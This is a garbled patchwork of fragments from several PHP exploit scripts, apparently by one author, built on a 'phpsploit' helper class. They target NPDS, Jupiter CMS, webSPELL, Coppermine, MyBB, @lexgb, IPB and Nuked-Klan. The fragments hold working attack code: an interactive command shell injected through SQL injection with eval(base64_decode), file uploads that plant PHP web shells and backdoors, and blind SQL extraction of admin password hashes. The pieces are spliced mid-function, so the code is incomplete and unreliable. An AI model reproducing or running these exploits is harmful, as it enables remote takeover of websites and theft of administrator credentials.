function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
if ($argc < 3) {
print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
exit(1);
}
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
$xpl->proxy($pro);
}
if ($pra) {
$xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125. settype ($lid, "integer");
# 126. PrintPage("links",$DB, $lid);
#
# 30. if ($oper=="links") {
# 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32. list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40. if ($DB) {
# 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
<?php
/*
Title: Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID: 12070214
Risk level: High
Author: DarkFig <*****@*****.**>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if ($argc < 5) {
print "\n------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------\n-----------------------------------------------------------------------\nPHP conditions: register_globals=On\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> -file <> [Options]\n Params: -url For example http://victim.com/webspell/ \n -file The file you wanna upload (c99shell.php...)\nOptions: -prefix Table prefix (default=webs)\n -upmatch The match which returns TRUE for the upload\n -sqlmatch The match which returns TRUE for the SQL injection\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/webspell/ -file c99shell.php\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
$file = getparam('file', 1);
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
print "\nExample.......: php xpl.php http://c.com/ admin passwd";
print "\n---------------------------------------------------------\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
print "\nstatus> Using a proxy {$pxs}";
$xpl->proxy($pxs);
}
if (!empty($pxa)) {
print "\nstatus> Basic proxy authentification {$pxa}";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
# They must correct the problem at the source =)
#
if ($argc < 3) {
print "\n--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url http://victim.com/ [Options]\n Params: -url For example http://victim.com/myBB/\nOptions: -debug Debug mod activated (debug_mybb.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\n Note: If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam('url', 1);
$debug = getparam('debug') != '' ? 1 : 0;
$benchmark = getparam('benchmark') != '' ? getparam('benchmark') : '1000000';
$proxy = getparam($proxy);
$proxyauth = getparam($proxyauth);
$backdoor = 'uploads/avatars/backdoor.php';
# inc/cache/backdoor.php
$filetoed = 'index.lang.php';
$xpl = new phpsploit();
$xpl->agent('Firefox');
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
# There is two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
# uid: 1
return false;
}
}
if ($_SERVER['argc'] == 7 or $_SERVER['argc'] == 8) {
$host = $_SERVER['argv'][1];
$path = $_SERVER['argv'][2];
$prefix = $_SERVER['argv'][3];
$gid = $_SERVER['argv'][4];
$pid = $_SERVER['argv'][5];
$uid = $_SERVER['argv'][6];
if ($_SERVER['argc'] == 8) {
$proxy = $_SERVER['argv'][7];
echo "Proxy: {$proxy} \n";
$xpl->proxy($proxy);
}
$xpl->agent('Internet Explorer');
echo "exploiting...\n";
echo "md5-hash: ";
for ($i = 1; $i <= 32; $i++) {
$found = false;
$h = 48;
while (!$found and $h <= 57) {
if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
$found = true;
echo chr($h);
}
$h++;
}
if (!$found) {
$h = 97;
while (!$found and $h <= 122) {
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
exit(1);
}
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
/*/
|
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
|
|
| livre_include.php -> Local File Inclusion
| =================
* @example $this->reset()
*
*/
function reset($func = '')
{
switch ($func) {
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
$ipb->web =& $web;
$ipb->main();
?>
# milw0rm.com [2008-08-29]
# ------------------------------------------------
# Author: DarkFig <*****@*****.**>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE);
# This file require the PhpSploit class.
$xpl = new phpsploit();
$url = 'http://localhost/nk/';
# url
$prx = '';
# proxy <proxyip>:<proxyport>
$pra = '';
# basic authentification <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($prx) {
$xpl->proxy($prx);
}
if ($pra) {
$xpl->proxyauth($pra);
}
$config = array();
$config[] = 'nuked';
# table prefix
$config[] = 'nuked';
# cookie prefix
$config[] = 'ORDER by date LIMIT 1';
# sql conditions
